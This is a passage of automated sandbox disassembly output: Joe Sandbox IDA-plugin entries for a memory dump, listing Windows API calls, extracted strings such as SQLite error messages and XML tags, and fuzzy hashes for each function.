                                    • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                    • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                    • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                    APIs
                                    • memset.MSVCRT ref: 004185FC
                                    • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 0041860A
                                    • ??3@YAXPAX@Z.MSVCRT ref: 00418650
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: ??3@AttributesFilememset
                                    • String ID:
                                    • API String ID: 776155459-0
                                    • Opcode ID: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                    • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                    • Opcode Fuzzy Hash: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                    • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                    APIs
                                    • AreFileApisANSI.KERNEL32 ref: 004174FC
                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                    • malloc.MSVCRT ref: 00417524
                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                    • ??3@YAXPAX@Z.MSVCRT ref: 00417544
                                    • ??3@YAXPAX@Z.MSVCRT ref: 00417562
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: ??3@ByteCharMultiWide$ApisFilemalloc
                                    • String ID:
                                    • API String ID: 2308052813-0
                                    • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                    • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                    • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                    • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                    APIs
                                    • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                    • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                    • ??3@YAXPAX@Z.MSVCRT ref: 0041822B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: PathTemp$??3@
                                    • String ID: %s\etilqs_$etilqs_
                                    • API String ID: 1589464350-1420421710
                                    • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                    • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                    • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                    • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                    APIs
                                    • memset.MSVCRT ref: 0040FDD5
                                      • Part of subcall function 00414E7F: memcpy.MSVCRT ref: 00414EFC
                                      • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                      • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                    • _snwprintf.MSVCRT ref: 0040FE1F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                    • String ID: <%s>%s</%s>$</item>$<item>
                                    • API String ID: 1775345501-2769808009
                                    • Opcode ID: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                    • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                    • Opcode Fuzzy Hash: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                    • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                    APIs
                                    • wcscpy.MSVCRT ref: 0041477F
                                    • wcscpy.MSVCRT ref: 0041479A
                                    • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General), ref: 004147C1
                                    • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: wcscpy$CloseCreateFileHandle
                                    • String ID: General
                                    • API String ID: 999786162-26480598
                                    • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                    • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                    • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                    • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: ErrorLastMessage_snwprintf
                                    • String ID: Error$Error %d: %s
                                    • API String ID: 313946961-1552265934
                                    • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                    • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                    • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                    • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: foreign key constraint failed$new$oid$old
                                    • API String ID: 0-1953309616
                                    • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                    • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                    • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                    • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                    APIs
                                    Strings
                                    • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                    • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                    • unknown column "%s" in foreign key definition, xrefs: 00431858
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: memcpy
                                    • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                    • API String ID: 3510742995-272990098
                                    • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                    • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                    • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                    • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: memcpymemset
                                    • String ID: gj
                                    • API String ID: 1297977491-4203073231
                                    • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                    • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                    • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                    • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                    APIs
                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040E961
                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040E974
                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040E987
                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040E99A
                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040E9D3
                                      • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: ??3@
                                    • String ID:
                                    • API String ID: 613200358-0
                                    • Opcode ID: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                    • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                    • Opcode Fuzzy Hash: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                    • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                    APIs
                                    • AreFileApisANSI.KERNEL32 ref: 00417497
                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                    • malloc.MSVCRT ref: 004174BD
                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                    • ??3@YAXPAX@Z.MSVCRT ref: 004174E4
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: ByteCharMultiWide$??3@ApisFilemalloc
                                    • String ID:
                                    • API String ID: 2903831945-0
                                    • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                    • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                    • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                    • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                    APIs
                                    • GetParent.USER32(?), ref: 0040D453
                                    • GetWindowRect.USER32(?,?), ref: 0040D460
                                    • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                    • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: Window$Rect$ClientParentPoints
                                    • String ID:
                                    • API String ID: 4247780290-0
                                    • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                    • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                    • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                    • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                    APIs
                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                    • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                    • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                    • memset.MSVCRT ref: 004450CD
                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                    • ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                      • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                      • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F63
                                      • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F75
                                      • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F9D
                                    • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                    • String ID:
                                    • API String ID: 1471605966-0
                                    • Opcode ID: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                    • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                    • Opcode Fuzzy Hash: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                    • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                    APIs
                                    • wcscpy.MSVCRT ref: 0044475F
                                    • wcscat.MSVCRT ref: 0044476E
                                    • wcscat.MSVCRT ref: 0044477F
                                    • wcscat.MSVCRT ref: 0044478E
                                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                      • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                      • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                                      • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                    • String ID: \StringFileInfo\
                                    • API String ID: 102104167-2245444037
                                    • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                    • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                    • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                    • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: ??3@
                                    • String ID:
                                    • API String ID: 613200358-0
                                    • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                    • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                    • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                    • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: memcpy$??3@
                                    • String ID: g4@
                                    • API String ID: 3314356048-2133833424
                                    • Opcode ID: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                    • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                    • Opcode Fuzzy Hash: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                    • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: _memicmpwcslen
                                    • String ID: @@@@$History
                                    • API String ID: 1872909662-685208920
                                    • Opcode ID: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                    • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                    • Opcode Fuzzy Hash: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                    • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                    APIs
                                    • memset.MSVCRT ref: 004100FB
                                    • memset.MSVCRT ref: 00410112
                                      • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                      • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                    • _snwprintf.MSVCRT ref: 00410141
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: memset$_snwprintf_wcslwrwcscpy
                                    • String ID: </%s>
                                    • API String ID: 3400436232-259020660
                                    • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                    • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                    • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                    • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                    APIs
                                    • memset.MSVCRT ref: 0040D58D
                                    • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                    • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: ChildEnumTextWindowWindowsmemset
                                    • String ID: caption
                                    • API String ID: 1523050162-4135340389
                                    • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                    • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                    • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                    • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                    APIs
                                      • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                      • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                    • CreateFontIndirectW.GDI32(?), ref: 00401156
                                    • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                    • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                    • String ID: MS Sans Serif
                                    • API String ID: 210187428-168460110
                                    • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                    • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                    • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                    • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: ClassName_wcsicmpmemset
                                    • String ID: edit
                                    • API String ID: 2747424523-2167791130
                                    • Opcode ID: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                    • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                    • Opcode Fuzzy Hash: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                    • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                    APIs
                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                    • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                    • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                    • String ID: SHAutoComplete$shlwapi.dll
                                    • API String ID: 3150196962-1506664499
                                    • Opcode ID: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                    • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                    • Opcode Fuzzy Hash: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                    • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: memcpy$memcmp
                                    • String ID:
                                    • API String ID: 3384217055-0
                                    • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                    • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                    • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                    • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: memset$memcpy
                                    • String ID:
                                    • API String ID: 368790112-0
                                    • Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                    • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                    • Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                    • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                    APIs
                                      • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                      • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                      • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                      • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                      • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                    • GetMenu.USER32(?), ref: 00410F8D
                                    • GetSubMenu.USER32(00000000), ref: 00410F9A
                                    • GetSubMenu.USER32(00000000), ref: 00410F9D
                                    • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                    • String ID:
                                    • API String ID: 1889144086-0
                                    • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                    • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                    • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                    • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                    APIs
                                    • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                    • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                    • GetLastError.KERNEL32 ref: 0041810A
